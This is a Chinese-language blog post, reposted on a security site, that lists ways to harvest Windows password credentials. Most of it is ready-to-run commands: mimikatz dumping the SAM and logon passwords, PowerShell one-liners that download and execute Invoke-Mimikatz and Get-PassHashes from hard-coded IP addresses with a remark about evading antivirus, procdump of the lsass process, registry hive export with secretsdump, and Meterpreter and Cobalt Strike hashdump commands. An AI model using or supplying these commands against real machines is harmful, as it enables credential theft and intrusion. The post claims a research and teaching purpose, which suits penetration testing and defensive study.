Windows获取密码凭证

admin 2021年8月27日14:33:14评论80 views字数 2516阅读8分23秒阅读模式

Windows获取密码凭证

Mimikatz本机非交互获取

mimikatz.exe “log res.txt” “privilege::debug” “token::elevate” “lsadump::sam” “exit”

mimikatz.exe “log logon.txt” “privilege::debug” “sekurlsa::logonpasswords” “exit”

命令解析:

“log res.txt” //将获取信息保存如本地运行路径 res.txt

privilege::debug //提升权限

“lsadump::sam” //将sam密码库,lsadump下来,

“sekurlsa::logonpasswords”//lohonpasswprds列出所有可用的提供程序凭据

1.x版本

inject::process lsass.exe sekurlsa.dll //注入 sekurlsa.dll 到 lsass.exe(用户登录程序) 进程里

@getLogonPasswords //获取密码

Powershell脚本

远程加载mimikatz脚本

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://47.96.224.128:8008/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds

解释:

powershell开启一个IEX缓存会话,从’http://39.108.68.207:8000/Invoke-Mimikatz.ps1加载远程脚本获取.缓存加载减少,被查杀的概率

注意本地回显并不会回显到VPS服务器上

远程加载Get-PassHashes脚本

powershell IEX(new-object net.webclient).downloadstring(‘http://47.96.224.128:8008/Get-PassHashes.ps1');Get-PassHashes

于上原理一致

WCE

WCE:Windows Credentials Editor WCE是跟mimikztz齐名的一款hash管理工具。

官网地址:https://www.ampliasecurity.com/research.html

32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

Pwddump

Ophcrack与彩虹表

如果网站无法破解出hash值,我们可以使用ophcrack工具配合彩虹表自己破解。

工具下载:https://ophcrack.sourceforge.io/

彩虹表:

https://ophcrack.sourceforge.io/tables.php

http://project-rainbowcrack.com/table.htm

Procdump + Mimikatz

Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Procdump lsass 进程导出:

For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp

For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

再把lsass.dmp文件加载mimikatz

sekurlsa::minidump lsass.dmp

最后显示

sekurlsa::logonPasswords full

注册表Get hash

reg save HKLMSYSTEM system.hiv

reg save HKLMSAM sam.hiv

reg save HKLMSECURITY security.hiv

mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit

11.15.7

python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

与之前方式不同

LaZagne

自动化获取脚本

项目地址: https://github.com/AlessandroZ/LaZagne

Meterpreter获取Hash

发不多说上马拿meterpreter

两种后渗透获取:

use post/windows/gather/hashdump //system权限的meterpreter

use post/windows/gather/smart_hashdump

image-20201115125430250

或者

直接

Mimikatz

Load mimikatz

获取用户密码的hash值

wdigest 、kerberos 、msv 、ssp 、tspkg 、livessp

mimikatz_command -h

mimikatz_command -f :: //查询有哪些模块

mimikatz_command -f samdump::hashes //从windows的sam文件中读取密码hash值

mimikatz_command -f sekurlsa::searchPasswords //获取明文密码

mimikatz_command -f samdump::bootkey

Cobaltstrrike获取

hashdump

logonpasswords

mimikatz sekurlsa::logonpasswords

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 巅峰极客线上第二场-writeup

CTF PlainR2B-PWN 很明显的栈溢出,第一次溢出打印write函数的地址,然后从和libc中的地址寻找偏移,最后利用system函数和libc中的/bin/sh,getshell后运行服务器上的getflag程序随意输入一些东西,进行多轮后会输出f…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月27日14:33:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows获取密码凭证https://cn-sec.com/archives/475112.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息